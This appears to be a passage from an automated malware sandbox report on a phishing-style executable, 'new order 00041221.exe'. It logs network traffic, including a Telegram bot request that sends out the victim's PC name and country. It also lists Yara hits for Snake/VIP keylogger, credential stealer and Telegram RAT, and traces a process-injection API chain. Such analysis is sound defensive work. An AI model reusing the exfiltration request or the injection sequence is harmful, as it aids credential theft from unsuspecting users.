                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 17
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ng%2BQ9Yv%2B0ZqkhX%2Fb2xHOxxW6kcsNLz%2BKt8ryjNZTZwtkH56AG7sYT06GmkPnTxp2RzGIb2Le7Gr%2BahjDiQsoe0aH528y6GQru0V%2BodvI4dq4EGlI%2BLJMrHuPqD6dWP5kzBU%2Bhrkn"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287975d62436f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.749725188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:27 UTC705INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:26 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 19
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cs6sVnYWhBNL7IfcE7g4biaK16fO4Gw7I5ae%2B2geEMKIfcXIDghlK2mIqDc7S8CkEDAr%2BuQp3qYPnJ25uAL5bbE5YOccxdyUSBVtPIFKph%2Fieh0Sdx%2BJZ1HVYe6AdHq2hNVD4Rjs"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287a97867440e-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.749726149.154.167.2204435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:27 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                          Host: api.telegram.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:27 UTC344INHTTP/1.1 404 Not Found
                                          Server: nginx/1.18.0
                                          Date: Fri, 26 Jul 2024 07:03:27 GMT
                                          Content-Type: application/json
                                          Content-Length: 55
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-07-26 07:03:27 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:1
                                          Start time:03:03:04
                                          Start date:26/07/2024
                                          Path:C:\Users\user\Desktop\new order 00041221.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\new order 00041221.exe"
                                          Imagebase:0x280000
                                          File size:740'864 bytes
                                          MD5 hash:F0C82F395D37FA87114CA7EF075695C8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:03:03:05
                                          Start date:26/07/2024
                                          Path:C:\Users\user\Desktop\new order 00041221.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\new order 00041221.exe"
                                          Imagebase:0xbd0000
                                          File size:740'864 bytes
                                          MD5 hash:F0C82F395D37FA87114CA7EF075695C8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:91.5%
                                            Signature Coverage:0.9%
                                            Total number of Nodes:328
                                            Total number of Limit Nodes:22
                                            execution_graph 47948 4c83548 47950 4c83570 47948->47950 47949 4c83598 47950->47949 47952 4c82b0c 47950->47952 47953 4c82b17 47952->47953 47957 4c85378 47953->47957 47963 4c85390 47953->47963 47954 4c83641 47954->47949 47958 4c854c1 47957->47958 47960 4c853c1 47957->47960 47958->47954 47959 4c853cd 47959->47954 47960->47959 47969 4c861d8 47960->47969 47973 4c861e8 47960->47973 47965 4c854c1 47963->47965 47966 4c853c1 47963->47966 47964 4c853cd 47964->47954 47965->47954 47966->47964 47967 4c861d8 CreateWindowExW 47966->47967 47968 4c861e8 CreateWindowExW 47966->47968 47967->47965 47968->47965 47970 4c861e8 47969->47970 47971 4c862c2 47970->47971 47977 4c873b1 47970->47977 47974 4c861ea 47973->47974 47975 4c862c2 47974->47975 47976 4c873b1 CreateWindowExW 47974->47976 47976->47975 47979 4c874bf 47977->47979 47978 4c874d5 47978->47971 47979->47978 47980 4c875d3 CreateWindowExW 47979->47980 47981 4c87634 47980->47981 47982 4c82d58 47983 4c82d9e GetCurrentProcess 47982->47983 47985 4c82de9 47983->47985 47986 4c82df0 GetCurrentThread 47983->47986 47985->47986 47987 4c82e2d GetCurrentProcess 47986->47987 47988 4c82e26 47986->47988 47989 4c82e63 47987->47989 47988->47987 47990 4c82e8b GetCurrentThreadId 47989->47990 47991 4c82ebc 47990->47991 48233 4dd171f FindCloseChangeNotification 48234 4dd1787 48233->48234 47992 6b75ea4 47993 6b75e2c 47992->47993 47995 6b75ea7 47992->47995 47999 6b76e9e 47993->47999 48022 6b76e38 47993->48022 48044 6b76e29 47993->48044 47994 6b75e3c 48000 6b76e2c 47999->48000 48001 6b76ea1 47999->48001 48012 6b76e5a 48000->48012 48066 6b77a16 48000->48066 48071 6b77508 48000->48071 48078 6b779ab 48000->48078 48083 6b777ec 48000->48083 48091 6b775cd 48000->48091 48096 6b7748d 48000->48096 48101 6b77b4f 48000->48101 48108 6b77240 48000->48108 48113 6b775a4 48000->48113 48118 6b774e5 48000->48118 48125 6b77438 48000->48125 48132 6b77518 48000->48132 48139 6b77db9 48000->48139 48145 6b776ba 48000->48145 48153 6b7787a 48000->48153 48160 6b77c3c 48000->48160 48165 6b7745c 48000->48165 48172 6b77dd3 48000->48172 48178 6b776f4 48000->48178 48001->47994 48012->47994 48023 6b76e52 48022->48023 48024 6b76e5a 48023->48024 48025 6b77a16 2 API calls 48023->48025 48026 6b776f4 4 API calls 48023->48026 48027 6b77dd3 2 API calls 48023->48027 48028 6b7745c 4 API calls 48023->48028 48029 6b77c3c 2 API calls 48023->48029 48030 6b7787a 4 API calls 48023->48030 48031 6b776ba 4 API calls 48023->48031 48032 6b77db9 2 API calls 48023->48032 48033 6b77518 4 API calls 48023->48033 48034 6b77438 4 API calls 48023->48034 48035 6b774e5 4 API calls 48023->48035 48036 6b775a4 2 API calls 48023->48036 48037 6b77240 2 API calls 48023->48037 48038 6b77b4f 4 API calls 48023->48038 48039 6b7748d 2 API calls 48023->48039 48040 6b775cd 2 API calls 48023->48040 48041 6b777ec 4 API calls 48023->48041 48042 6b779ab 2 API calls 48023->48042 48043 6b77508 4 API calls 48023->48043 48024->47994 48025->48024 48026->48024 48027->48024 48028->48024 48029->48024 48030->48024 48031->48024 48032->48024 48033->48024 48034->48024 48035->48024 48036->48024 48037->48024 48038->48024 48039->48024 48040->48024 48041->48024 48042->48024 48043->48024 48045 6b76e52 48044->48045 48046 6b77a16 2 API calls 48045->48046 48047 6b776f4 4 API calls 48045->48047 48048 6b77dd3 2 API calls 48045->48048 48049 6b7745c 4 API calls 48045->48049 48050 6b77c3c 2 API calls 48045->48050 48051 6b7787a 4 API calls 48045->48051 48052 6b776ba 4 API calls 48045->48052 48053 6b77db9 2 API calls 48045->48053 48054 6b77518 4 API calls 48045->48054 48055 6b77438 4 API calls 48045->48055 48056 6b76e5a 48045->48056 48057 6b774e5 4 API calls 48045->48057 48058 6b775a4 2 API calls 48045->48058 48059 6b77240 2 API calls 48045->48059 48060 6b77b4f 4 API calls 48045->48060 48061 6b7748d 2 API calls 48045->48061 48062 6b775cd 2 API calls 48045->48062 48063 6b777ec 4 API calls 48045->48063 48064 6b779ab 2 API calls 48045->48064 48065 6b77508 4 API calls 48045->48065 48046->48056 48047->48056 48048->48056 48049->48056 48050->48056 48051->48056 48052->48056 48053->48056 48054->48056 48055->48056 48056->47994 48057->48056 48058->48056 48059->48056 48060->48056 48061->48056 48062->48056 48063->48056 48064->48056 48065->48056 48067 6b779d1 48066->48067 48185 6b75641 48067->48185 48189 6b75648 48067->48189 48068 6b77c65 48073 6b77444 48071->48073 48072 6b77a5d 48072->48012 48073->48072 48193 6b75490 48073->48193 48197 6b75498 48073->48197 48201 6b75550 48073->48201 48205 6b75558 48073->48205 48079 6b779b8 48078->48079 48209 6b75310 48079->48209 48213 6b75309 48079->48213 48080 6b77d3b 48084 6b777f0 48083->48084 48217 6b753c0 48084->48217 48221 6b753b9 48084->48221 48085 6b7780b 48087 6b75310 ResumeThread 48085->48087 48088 6b75309 ResumeThread 48085->48088 48086 6b77d3b 48087->48086 48088->48086 48092 6b775e7 48091->48092 48094 6b75641 ReadProcessMemory 48092->48094 48095 6b75648 ReadProcessMemory 48092->48095 48093 6b77c65 48094->48093 48095->48093 48097 6b77493 48096->48097 48099 6b75550 WriteProcessMemory 48097->48099 48100 6b75558 WriteProcessMemory 48097->48100 48098 6b774c5 48099->48098 48100->48098 48102 6b77444 48101->48102 48103 6b77a5d 48102->48103 48104 6b75490 VirtualAllocEx 48102->48104 48105 6b75498 VirtualAllocEx 48102->48105 48106 6b75550 WriteProcessMemory 48102->48106 48107 6b75558 WriteProcessMemory 48102->48107 48103->48012 48104->48102 48105->48102 48106->48102 48107->48102 48109 6b77250 48108->48109 48110 6b77419 48109->48110 48225 6b757e0 48109->48225 48229 6b757d4 48109->48229 48110->48012 48114 6b775b4 48113->48114 48116 6b75550 WriteProcessMemory 48114->48116 48117 6b75558 WriteProcessMemory 48114->48117 48115 6b77cb3 48116->48115 48117->48115 48119 6b77444 48118->48119 48120 6b77a5d 48119->48120 48121 6b75490 VirtualAllocEx 48119->48121 48122 6b75498 VirtualAllocEx 48119->48122 48123 6b75550 WriteProcessMemory 48119->48123 48124 6b75558 WriteProcessMemory 48119->48124 48120->48012 48121->48119 48122->48119 48123->48119 48124->48119 48126 6b77444 48125->48126 48127 6b77a5d 48126->48127 48128 6b75490 VirtualAllocEx 48126->48128 48129 6b75498 VirtualAllocEx 48126->48129 48130 6b75550 WriteProcessMemory 48126->48130 48131 6b75558 WriteProcessMemory 48126->48131 48127->48012 48128->48126 48129->48126 48130->48126 48131->48126 48135 6b753c0 Wow64SetThreadContext 48132->48135 48136 6b753b9 Wow64SetThreadContext 48132->48136 48133 6b77532 48137 6b75641 ReadProcessMemory 48133->48137 48138 6b75648 ReadProcessMemory 48133->48138 48134 6b77c65 48135->48133 48136->48133 48137->48134 48138->48134 48140 6b774a4 48139->48140 48141 6b77dcd 48140->48141 48143 6b75550 WriteProcessMemory 48140->48143 48144 6b75558 WriteProcessMemory 48140->48144 48142 6b774c5 48143->48142 48144->48142 48146 6b777f0 48145->48146 48151 6b753c0 Wow64SetThreadContext 48146->48151 48152 6b753b9 Wow64SetThreadContext 48146->48152 48147 6b7780b 48149 6b75310 ResumeThread 48147->48149 48150 6b75309 ResumeThread 48147->48150 48148 6b77d3b 48149->48148 48150->48148 48151->48147 48152->48147 48154 6b77444 48153->48154 48155 6b77a5d 48154->48155 48156 6b75490 VirtualAllocEx 48154->48156 48157 6b75498 VirtualAllocEx 48154->48157 48158 6b75550 WriteProcessMemory 48154->48158 48159 6b75558 WriteProcessMemory 48154->48159 48155->48012 48156->48154 48157->48154 48158->48154 48159->48154 48161 6b77c42 48160->48161 48162 6b77c65 48161->48162 48163 6b75641 ReadProcessMemory 48161->48163 48164 6b75648 ReadProcessMemory 48161->48164 48163->48162 48164->48162 48167 6b77444 48165->48167 48166 6b77a5d 48166->48012 48167->48166 48168 6b75490 VirtualAllocEx 48167->48168 48169 6b75498 VirtualAllocEx 48167->48169 48170 6b75550 WriteProcessMemory 48167->48170 48171 6b75558 WriteProcessMemory 48167->48171 48168->48167 48169->48167 48170->48167 48171->48167 48173 6b77de0 48172->48173 48174 6b775cc 48172->48174 48176 6b75641 ReadProcessMemory 48174->48176 48177 6b75648 ReadProcessMemory 48174->48177 48175 6b77c65 48176->48175 48177->48175 48180 6b77444 48178->48180 48179 6b77a5d 48179->48012 48180->48178 48180->48179 48181 6b75550 WriteProcessMemory 48180->48181 48182 6b75558 WriteProcessMemory 48180->48182 48183 6b75490 VirtualAllocEx 48180->48183 48184 6b75498 VirtualAllocEx 48180->48184 48181->48180 48182->48180 48183->48180 48184->48180 48186 6b75693 ReadProcessMemory 48185->48186 48188 6b756d7 48186->48188 48188->48068 48190 6b75693 ReadProcessMemory 48189->48190 48192 6b756d7 48190->48192 48192->48068 48194 6b75498 VirtualAllocEx 48193->48194 48196 6b75515 48194->48196 48196->48073 48198 6b7549c VirtualAllocEx 48197->48198 48200 6b75515 48198->48200 48200->48073 48202 6b755a0 WriteProcessMemory 48201->48202 48204 6b755f7 48202->48204 48204->48073 48206 6b755a0 WriteProcessMemory 48205->48206 48208 6b755f7 48206->48208 48208->48073 48210 6b75350 ResumeThread 48209->48210 48212 6b75381 48210->48212 48212->48080 48214 6b75350 ResumeThread 48213->48214 48216 6b75381 48214->48216 48216->48080 48218 6b75405 Wow64SetThreadContext 48217->48218 48220 6b7544d 48218->48220 48220->48085 48222 6b75405 Wow64SetThreadContext 48221->48222 48224 6b7544d 48222->48224 48224->48085 48226 6b757e4 CreateProcessA 48225->48226 48228 6b75a2b 48226->48228 48230 6b757e0 CreateProcessA 48229->48230 48232 6b75a2b 48230->48232 48301 b0d1d4 48302 b0d1ec 48301->48302 48303 b0d246 48302->48303 48311 4c876c8 48302->48311 48317 4c86f24 48302->48317 48321 4c86f14 48302->48321 48325 4c877f1 48302->48325 48329 4c86edf 48302->48329 48333 4c88428 48302->48333 48337 4c876b8 48302->48337 48312 4c876ee 48311->48312 48313 4c86f14 CallWindowProcW 48312->48313 48314 4c876fa 48313->48314 48315 4c86f24 CallWindowProcW 48314->48315 48316 4c8770f 48315->48316 48316->48303 48318 4c86f2f 48317->48318 48320 4c88489 48318->48320 48343 4c8704c CallWindowProcW 48318->48343 48322 4c86f1f 48321->48322 48322->48303 48324 4c88489 48322->48324 48344 4c8704c CallWindowProcW 48322->48344 48327 4c87800 48325->48327 48327->48303 48328 4c88489 48327->48328 48345 4c8704c CallWindowProcW 48327->48345 48330 4c86f0d 48329->48330 48330->48303 48332 4c88489 48330->48332 48346 4c8704c CallWindowProcW 48330->48346 48334 4c88438 48333->48334 48336 4c88489 48334->48336 48347 4c8704c CallWindowProcW 48334->48347 48338 4c876ee 48337->48338 48339 4c86f14 CallWindowProcW 48338->48339 48340 4c876fa 48339->48340 48341 4c86f24 CallWindowProcW 48340->48341 48342 4c8770f 48341->48342 48342->48303 48343->48320 48344->48324 48345->48328 48346->48332 48347->48336 48235 6b780e0 48236 6b7826b 48235->48236 48237 6b78106 48235->48237 48237->48236 48240 6b78360 PostMessageW 48237->48240 48242 6b78359 PostMessageW 48237->48242 48241 6b783cc 48240->48241 48241->48237 48243 6b783cc 48242->48243 48243->48237 48348 4c82fa0 DuplicateHandle 48349 4c83036 48348->48349 48350 4c89ab1 48351 4c89ae0 48350->48351 48352 4c89bcc 48351->48352 48353 4c89b22 48351->48353 48354 4c86f24 CallWindowProcW 48352->48354 48355 4c89b7a CallWindowProcW 48353->48355 48356 4c89b29 48353->48356 48354->48356 48355->48356 48244 b5c268 48245 b5c283 48244->48245 48248 b5ab74 48245->48248 48249 b5ab7f 48248->48249 48252 b5ac30 48249->48252 48251 b5c2a3 48253 b5ac3b 48252->48253 48255 b5c62c 48253->48255 48256 b5acec 48253->48256 48255->48251 48258 b5acf7 48256->48258 48257 b5c83c 48257->48255 48258->48257 48261 b5c94c 48258->48261 48260 b5d122 48260->48255 48262 b5c957 48261->48262 48265 b5c96c 48262->48265 48264 b5d225 48264->48260 48266 b5c977 48265->48266 48267 b5e08b 48266->48267 48269 4c80919 48266->48269 48267->48264 48273 4c80950 48269->48273 48276 4c8093f 48269->48276 48270 4c8092e 48270->48267 48281 4c80a48 48273->48281 48274 4c8095f 48274->48270 48277 4c8094a 48276->48277 48278 4c80906 48276->48278 48280 4c80a48 2 API calls 48277->48280 48278->48270 48279 4c8095f 48279->48270 48280->48279 48282 4c80a59 48281->48282 48283 4c80a7c 48281->48283 48282->48283 48289 4c80cd1 48282->48289 48293 4c80ce0 48282->48293 48283->48274 48284 4c80a74 48284->48283 48285 4c80c80 GetModuleHandleW 48284->48285 48286 4c80cad 48285->48286 48286->48274 48290 4c80ce0 48289->48290 48292 4c80d19 48290->48292 48297 4c80460 48290->48297 48292->48284 48294 4c80ce2 48293->48294 48295 4c80d19 48294->48295 48296 4c80460 LoadLibraryExW 48294->48296 48295->48284 48296->48295 48298 4c80ec0 LoadLibraryExW 48297->48298 48300 4c80f39 48298->48300 48300->48292

                                            Executed Functions

                                            Function 04DF4640 Relevance: 2.9, Instructions: 2895COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f52b38d7b9db2801291b7f30fae37056a597021abbd9071887eec498fdb89cd6
                                            • Instruction ID: 7f69581b325ae71894d610494a8950a317bec46c6575a3b24eee5786f326d2c2
                                            • Opcode Fuzzy Hash: f52b38d7b9db2801291b7f30fae37056a597021abbd9071887eec498fdb89cd6
                                            • Instruction Fuzzy Hash: 82531F34A00219DFDB24DF68C898A9DB7B2FF49300F568599E919AB361DB31ED81CF50
                                            Function 04DD65D0 Relevance: .5, Instructions: 478COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4dd0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e19e013944b1643865b08b84e2ac1e89da4a95a85a9ad394f690832078ef8654
                                            • Instruction ID: b767f5774f20ddf819f49059e5dd4274eeb9784a3c9461c62e79f5427202d093
                                            • Opcode Fuzzy Hash: e19e013944b1643865b08b84e2ac1e89da4a95a85a9ad394f690832078ef8654
                                            • Instruction Fuzzy Hash: BE223B34A10219CFDB24DF68D884A9DBBB2FF85314F15C1A9E409AB265DB30ED85CF90
                                            Function 04DF75C0 Relevance: .4, Instructions: 441COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43974b95db2d4a54d115d376757c0890094ca994956a7a7327c8afc4fc37208d
                                            • Instruction ID: 6167f4e95775e911fa89ef20729b538bbeeb2c5a59145b667f95d17350633f74
                                            • Opcode Fuzzy Hash: 43974b95db2d4a54d115d376757c0890094ca994956a7a7327c8afc4fc37208d
                                            • Instruction Fuzzy Hash: 36029475B00701CFD725DF68C884AAABBB2FF89304B168569D6199B361DB31FC42CB91
                                            Function 04C86F4C Relevance: .3, Instructions: 253COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03e2e0b5ccfe0140e1527ef72a3e4dd2acce9ea30d9924aa2ab3b99e0e834f42
                                            • Instruction ID: 41f2216d5700e054c1bf2c503a82551dd2163be7abd6cd00963873474d401a14
                                            • Opcode Fuzzy Hash: 03e2e0b5ccfe0140e1527ef72a3e4dd2acce9ea30d9924aa2ab3b99e0e834f42
                                            • Instruction Fuzzy Hash: 8AA18435E003198FCB14EFA4D8949EDBBBBFF99314F258619E415AF260EB30A945CB50
                                            Function 04C87810 Relevance: .2, Instructions: 221COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64d69cb58e4c14fb46136ac93849c8d2b53d0705b0c8df95b10238673a05d249
                                            • Instruction ID: 7cf52b27d976d6266d8d71de9fd0fb043454316b315a2aae28bc548418461e3f
                                            • Opcode Fuzzy Hash: 64d69cb58e4c14fb46136ac93849c8d2b53d0705b0c8df95b10238673a05d249
                                            • Instruction Fuzzy Hash: 0F918135E003099FCB14EFA4DC849DDBBBBFF99314F258619E415AB264EB30A945CB50
                                            Function 06B77240 Relevance: .2, Instructions: 165COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a787b28ac42564aec65302965fb165b73768f9efc73da164a5c26a414c283ea7
                                            • Instruction ID: a2a10bba392a765dcfb30a110ead81eda2956e5f0ce6200a75a5ee4da69a7d23
                                            • Opcode Fuzzy Hash: a787b28ac42564aec65302965fb165b73768f9efc73da164a5c26a414c283ea7
                                            • Instruction Fuzzy Hash: DD6135B1D44719CFEB68CF66C8407E9BBB6BF89300F14D1EA9419A6254EB704A85CF40
                                            Function 06B70006 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
